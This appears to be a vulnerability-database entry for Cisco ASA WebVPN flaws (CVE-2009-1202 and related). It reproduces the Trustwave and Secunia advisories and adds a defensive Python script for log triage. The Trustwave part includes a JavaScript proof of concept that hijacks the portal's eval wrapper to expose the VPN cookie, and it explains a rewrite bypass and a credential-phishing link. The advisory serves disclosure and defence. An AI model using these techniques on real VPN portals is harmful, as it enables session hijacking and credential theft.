var-200906-0069
Vulnerability from variot

WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705. Cisco ASA is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass HTML rewrite rules. Successfully exploiting this issue will aid in cross-site scripting attacks. This issue is documented by Cisco Bug ID CSCsy80705. Cisco ASA 8.0(4), 8.1.2, and 8.2.1 are vulnerable.

Trustwave's SpiderLabs Security Advisory TWSL2009-002: Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24 Version: 1.0

Vendor: Cisco Systems, Inc. (http://www.cisco.com)

Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description: Cisco's Adaptive Security Appliance (ASA) provides a number of security related features, including "Web VPN" functionality that allows authenticated users to access a variety of content through a web interface. This includes other web content, FTP servers, and CIFS file servers.

The web content is proxied by the ASA and rewritten so that any URLs in the web content are passed as query parameters sent to the ASA web interface. Where scripting content is present, the ASA places a JavaScript wrapper around the original webpage's Document Object Model (DOM), to prevent the webpage from accessing the ASA's DOM. For example, the "csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by "CSCO_WebVPN['process']". The result of this call is then used in an "eval" statement.

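function csco_wrap_js(str)
{
   var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
           "/+CSCOL+/cte.js></scr"+
           "ipt><script id=CSCO_GHOST src="+
           CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
   var js_mangled=CSCO_WebVPN['process']('js',str);
   ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
   return ret;
};

To exploit this behavior, a malicious page can rewrite "CSCO_WebVPN['process']" with an attacker-defined function that will return an arbitrary value. The next time the "csco_wrap_js" function is called, the malicious code will be executed. Below is a proof of concept.

<html><script>
function a(b, c)
{
   return "alert('Your VPN location:\\n\\n'+" +
   "document.location+'\\n\\n\\n\\n\\n" +
   "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>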

Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202

When a webpage is requested through the ASA's Web VPN, the targeted scheme and hostname are ROT13-encoded, then hex-encoded and placed in the ASA's URL. For example, "http://www.trustwave.com" is accessed by requesting the following ASA path:

/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/

The HTML content of this request is obviously reformatted by the ASA, starting at the very beginning:

  <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the initial hex value of "00" to "01", the HTML document is returned without any rewriting. This allows the page's scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial.

Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203

When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner as the web requests described above. The following URL attempts to connect to ftp.example.com; normally, it would be in an HTML frame within the Web VPN website.

/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL was sent to a user by an attacker, it is very possible that a user would assume that he needs to resubmit credentials to the Web VPN. The ASA would then forward the credentials to the attacker's FTP or CIFS server.
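The URL encodings described in Findings 2 and 3 can be decoded during log review. The following is an added example, not part of the Trustwave advisory or Cisco's code: it decodes both URL forms and flags /+CSCO+ requests whose leading byte is not "00" as well as file-browse links that point outside an allow-list. The function names, the allow-list host and the altered sample request are assumptions constructed for illustration.

```python
import codecs
import re
from urllib.parse import parse_qs, urlsplit

# /+CSCO+<hex>++/<rest>: the hex run is one prefix byte followed by the
# ROT13-encoded scheme and host, as described in Finding 2.
_WEB_RE = re.compile(r"^/\+CSCO\+((?:[0-9A-Fa-f]{2})+)\+\+(/.*)?$")
_FILES_PATH = "/+CSCOE+/files/browse.html"
_HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")

# The two sample URLs printed in the advisory. Note that the first one
# decodes to https://www.trustwave.com.
PAGE_WEB_PATH = "/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/"
PAGE_FILES_URL = ("/+CSCOE+/files/browse.html?code=init"
                  "&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a")

# Constructed request list for the triage demo: the advisory's samples plus
# a copy of the first with the leading byte changed, as Finding 2 describes.
SAMPLE_REQUESTS = [
    PAGE_WEB_PATH,
    "/+CSCO+01" + PAGE_WEB_PATH[len("/+CSCO+00"):],
    PAGE_FILES_URL,
    "/+CSCOE+/logon.html",
]


def _unrot13_hex(hex_text):
    """Hex-decode, then undo ROT13 (ROT13 is its own inverse)."""
    raw = bytes.fromhex(hex_text)
    return codecs.decode(raw.decode("latin-1"), "rot13")


def decode_web_path(path):
    """Return (prefix_byte, destination, rest) for a /+CSCO+ path, else None."""
    match = _WEB_RE.match(path)
    if not match:
        return None
    hex_run = match.group(1)
    prefix = int(hex_run[:2], 16)
    return prefix, _unrot13_hex(hex_run[2:]), match.group(2) or "/"


def decode_files_url(url):
    """Return (scheme, host) for a browse.html link, else None."""
    parts = urlsplit(url)
    if parts.path != _FILES_PATH:
        return None
    values = parse_qs(parts.query).get("path")
    if not values:
        return None
    scheme, sep, remainder = values[0].partition("://")
    # Assumption: anything after the first "/" is a share path, not host.
    host_hex = remainder.split("/", 1)[0]
    if not sep or not _HEX_RE.match(host_hex):
        return None
    return scheme, _unrot13_hex(host_hex)


def triage(requests, allowed_file_hosts):
    """Return (request, reason, decoded_target) for requests worth reviewing."""
    findings = []
    for request in requests:
        web = decode_web_path(request)
        if web is not None:
            prefix, destination, _rest = web
            if prefix != 0x00:
                findings.append((request, "non-00 prefix byte", destination))
            continue
        files = decode_files_url(request)
        if files is not None:
            scheme, host = files
            if host.lower() not in allowed_file_hosts:
                findings.append((request, "file share outside allow-list",
                                 f"{scheme}://{host}"))
    return findings


if __name__ == "__main__":
    # "files.corp.example" is a hypothetical approved file server.
    for request, reason, target in triage(SAMPLE_REQUESTS,
                                          {"files.corp.example"}):
        print(f"{reason}: {target}  <-  {request}")
```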

Vendor Response: This vulnerability has been corrected in versions 8.0.4.34, and 8.1.2.25.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Vendor Communication Timeline:
03/31/09 - Cisco notified of vulnerabilities
06/24/09 - Cisco software updates released; Advisory released

Remediation Steps: Install updated software from Cisco.

Revision History: 1.0 Initial publication

About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



TITLE: Cisco ASA WebVPN Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA35511

VERIFY ADVISORY: http://secunia.com/advisories/35511/

DESCRIPTION: Some vulnerabilities and a security issue have been reported in Cisco Adaptive Security Appliance (ASA), which can be exploited by malicious people to conduct cross-site scripting and spoofing attacks.

1) Input passed within web pages is not properly sanitised before being used in a call to eval() in context of the VPN web portal. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the WebVPN. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the VPN web portal.

3) A security issue exists in the handling of Common Internet File System (CIFS) and FTP shares in the SSL VPN feature. This can be exploited to conduct spoofing attacks and potentially disclose the user's credentials if a user follows a specially crafted link.

The vulnerabilities are reported in versions prior to 8.0.4(34), 8.1.2(25), and 8.2.1(3) that are configured to accept Clientless SSL VPN connections.

SOLUTION: Update to version 8.0.4(34), 8.1.2(25), or 8.2.1(3). http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

PROVIDED AND/OR DISCOVERED BY: David Byrne, Trustwave's SpiderLabs

ORIGINAL ADVISORY:
Cisco:
http://tools.cisco.com/security/center/viewAlert.x?alertId=18373
http://tools.cisco.com/security/center/viewAlert.x?alertId=18442
http://tools.cisco.com/security/center/viewAlert.x?alertId=18536

Trustwave: https://www.trustwave.com/spiderlabs/advisories/TWSL2009-002.txt




{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200906-0069",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 2.7,
        "vendor": "cisco",
        "version": "8.2.1"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 2.7,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "8.0\\(4\\)"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "8.0(4)"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "*"
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "adaptive security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.2.13"
      },
      {
        "model": "adaptive security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2.25"
      },
      {
        "model": "adaptive security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.0.4.34"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:adaptive_security_appliance:8.2.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:adaptive_security_appliance:8.1.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:adaptive_security_appliance:8.0\\(4\\):*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:adaptive_security_appliance:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "David Byrne  davidribyrne@yahoo.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-1202",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2009-1202",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-38648",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-1202",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200906-387",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-38648",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705. Cisco ASA is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass HTML rewrite rules. Successfully exploiting this issue will aid in cross-site scripting attacks. \nThis issue is documented by Cisco Bug ID CSCsy80705. \nCisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable. Trustwave\u0027s SpiderLabs Security Advisory TWSL2009-002: \nCisco ASA Web VPN Multiple Vulnerabilities\n\nPublished: 2009-06-24 Version: 1.0\n\nVendor: Cisco Systems, Inc. (http://www.cisco.com)\n\nVersions affected: 8.0(4), 8.1.2, and 8.2.1\n\nDescription: Cisco\u0027s Adaptive Security Appliance (ASA)\nprovides a number of security related features, including\n\"Web VPN\" functionality that allows authenticated users to\naccess a variety of content through a web interface. This\nincludes other web content, FTP servers, and CIFS file\nservers. \n\nThe web content is proxied by the ASA and rewritten so that\nany URLs in the web content are passed as query parameters\nsent to the ASA web interface. Where scripting content is\npresent, the ASA places a JavaScript wrapper around the\noriginal webpage\u0027s Document Object Model (DOM), to prevent\nthe webpage from accessing the ASA\u0027s DOM. For example, the\n\"csco_wrap_js\" JavaScript function in /+CSCOL+/cte.js makes\na call to a function referenced by \"CSCO_WebVPN[\u0027process\u0027]\". \nThe result of this call is then used in an \"eval\" statement. 
\n\nfunction csco_wrap_js(str)\n{\n   var ret=\"\u003cscript id=CSCO_GHOST src=\"+CSCO_Gateway+\n           \"/+CSCOL+/cte.js\u003e\u003c/scr\"+\n           \"ipt\u003e\u003cscript id=CSCO_GHOST src=\"+\n           CSCO_Gateway+\"/+CSCOE+/apcf\u003e\u003c/sc\"+\"ript\u003e\";\n   var js_mangled=CSCO_WebVPN[\u0027process\u0027](\u0027js\u0027,str);\n   ret+=CSCO_WebVPN[\u0027process\u0027](\u0027html\u0027,eval(js_mangled));\n   return ret;\n};\n\nTo exploit this behavior, a malicious page can rewrite\n\"CSCO_WebVPN[\u0027process\u0027]\" with an attacker-defined function\nthat will return an arbitrary value. The next time the\n\"csco_wrap_js\" function is called, the malicious code will\nbe executed. Below is a proof of concept. \n\n\u003chtml\u003e\u003cscript\u003e\nfunction a(b, c)\n{\n   return \"alert(\u0027Your VPN location:\\\\n\\\\n\u0027+\" +\n   \"document.location+\u0027\\\\n\\\\n\\\\n\\\\n\\\\n\" +\n   \"Your VPN cookie:\\\\n\\\\n\u0027+document.cookie);\";\n}\nCSCO_WebVPN[\u0027process\u0027] = a;\ncsco_wrap_js(\u0027\u0027);\n\u003c/script\u003e\u003c/html\u003e\n\nVendor Response:\nThis vulnerability has been corrected in versions 8.0.4.34,\nand 8.1.2.25. \n\nCVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C\nBase: 4.3\nTemporal: 3.9\n\n\nFinding 2: HTML Rewriting Bypass\nCVE: CVE-2009-1202\nWhen a webpage is requested through the ASA\u0027s Web VPN, the\ntargeted scheme and hostname is Rot13-encoded, then\nhex-encoded and placed in the ASA\u0027s URL. 
For example,\n\"http://www.trustwave.com\" is accessed by requesting the\nfollowing ASA path:\n      \n/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+\n+/\n\nThe HTML content of this request is obviously reformatted by\nthe ASA, starting at the very beginning:\n\n      \u003cscript id=\u0027CSCO_GHOST\u0027 src=\"/+webvpn+/toolbar.js\"\u003e\n\nHowever, if the request URL is modified to change the\ninitial hex value of \"00\" to \"01\", the HTML document is\nreturned without any rewriting. This allows the pages\nscriptable content to run in the ASA\u0027s DOM, making\nCross-Site Scripting trivial. \n\nVendor Response:\nThis vulnerability has been corrected in versions 8.0.4.34,\nand 8.1.2.25. \n\nCVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C\nBase: 4.3\nTemporal: 3.9\n\n\nFinding 3: Authentication Credential Theft\nCVE: CVE-2009-1203\nWhen a user accesses an FTP or CIFS destination using the\nWeb VPN, the resulting URL is formatted in a similar manner\nas the web requests described above. The following URL\nattempts to connect to ftp.example.com; normally, it would\nbe in an HTML frame within the Web VPN website. \n\n      \n/+CSCOE+/files/browse.html?code=init\u0026path=ftp%3A%2F%2F736763\n2e726b6e7a6379722e70627a\n\nThe ASA first attempts to connect to the FTP server or CIFS\nshare using anonymous credentials. If those fail, the user\nis prompted for login credentials. When viewed on its own\n(outside of a frame), the submission form gives no\nindication what it is for and is very similar in appearance\nto the Web VPN\u0027s primary login page. If the URL was sent to\na user by an attacker, it is very possible that a user would\nassume that he needs to resubmit credentials to the Web VPN. \nThe ASA would then forward the credentials to the attacker\u0027s\nFTP or CIFS server. \n\nVendor Response:\nThis vulnerability has been corrected in versions 8.0.4.34,\nand 8.1.2.25. 
\n\nCVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C\nBase: 4.3\nTemporal: 3.9\n\n\nVendor Communication Timeline:\n03/31/09 - Cisco notified of vulnerabilities\n06/24/09 - Cisco software updates released; Advisory\n           released\n\nRemediation Steps: Install updated software from Cisco. \n\n\nRevision History: 1.0 Initial publication\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and\nsubscription-based information security and payment card\nindustry compliance management solutions to businesses and\ngovernment entities throughout the world. For organizations\nfaced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with\ncomprehensive solutions that include its flagship\nTrustKeeper compliance management software and other\nproprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500\nbusinesses and large financial institutions to small and\nmedium-sized retailers--manage compliance and secure their\nnetwork infrastructure, data communications and critical\ninformation assets. Trustwave is headquartered in Chicago\nwith offices throughout North America, South America,\nEurope, Africa, China and Australia. For more information,\nvisit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs is the advance security team at Trustwave\nresponsible for incident response and forensics, ethical\nhacking and application security tests for Trustwave\u0027s\nclients. SpiderLabs has responded to hundreds of security\nincidents, performed thousands of ethical hacking exercises\nand tested the security of hundreds of business applications\nfor Fortune 500 organizations. For more information visit\nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as\nis\" without warranty of any kind. 
Trustwave disclaims all\nwarranties, either express or implied, including the\nwarranties of merchantability and fitness for a particular\npurpose. In no event shall Trustwave or its suppliers be\nliable for any damages whatsoever including direct,\nindirect, incidental, consequential, loss of business\nprofits or special damages, even if Trustwave or its\nsuppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or\nlimitation of liability for consequential or incidental\ndamages so the foregoing limitation may not apply. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nCisco ASA WebVPN Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA35511\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/35511/\n\nDESCRIPTION:\nSome vulnerabilities and a security issue have been reported in Cisco\nAdaptive Security Appliance (ASA), which can be exploited by malicious\npeople to conduct cross-site scripting and spoofing attacks. \n\n1) Input passed within web pages is not properly sanitised before\nbeing used in a call to eval() in context of the VPN web portal. 
This\ncan be exploited to execute arbitrary HTML and script code in user\u0027s\nbrowser session in context of the WebVPN. This can be\nexploited to execute arbitrary HTML and script code in a user\u0027s\nbrowser session in context of the VPN web portal. \n\n3) A security issue exists in the handling of Common Internet File\nSystem (CIFS) and FTP shares in the SSL VPN feature. This can be\nexploited to conduct spoofing attacks and potentially disclose the\nuser\u0027s credentials if a user follows a specially crafted link. \n\nThe vulnerabilities are reported in versions prior to 8.0.4(34),\n8.1.2(25), and 8.2.1(3) that are configured to accept Clientless SSL\nVPN connections. \n\nSOLUTION:\nUpdate to version 8.0.4(34), 8.1.2(25), or 8.2.1(3). \nhttp://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT\n\nPROVIDED AND/OR DISCOVERED BY:\nDavid Byrne, Trustwave\u0027s SpiderLabs\n\nORIGINAL ADVISORY:\nCisco:\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=18373\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=18442\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=18536\n\nTrustwave:\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2009-002.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. 
\n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1202"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870"
      },
      {
        "db": "BID",
        "id": "35480"
      },
      {
        "db": "VULHUB",
        "id": "VHN-38648"
      },
      {
        "db": "PACKETSTORM",
        "id": "78639"
      },
      {
        "db": "PACKETSTORM",
        "id": "78856"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-1202",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "35480",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "35511",
        "trust": 1.2
      },
      {
        "db": "SECTRACK",
        "id": "1022457",
        "trust": 1.1
      },
      {
        "db": "VUPEN",
        "id": "ADV-2009-1713",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001870",
        "trust": 0.8
      },
      {
        "db": "BUGTRAQ",
        "id": "20090624 TRUSTWAVE\u0027S SPIDERLABS SECURITY ADVISORY TWSL2009-002",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-387",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-38648",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78639",
        "trust": 0.1
      },
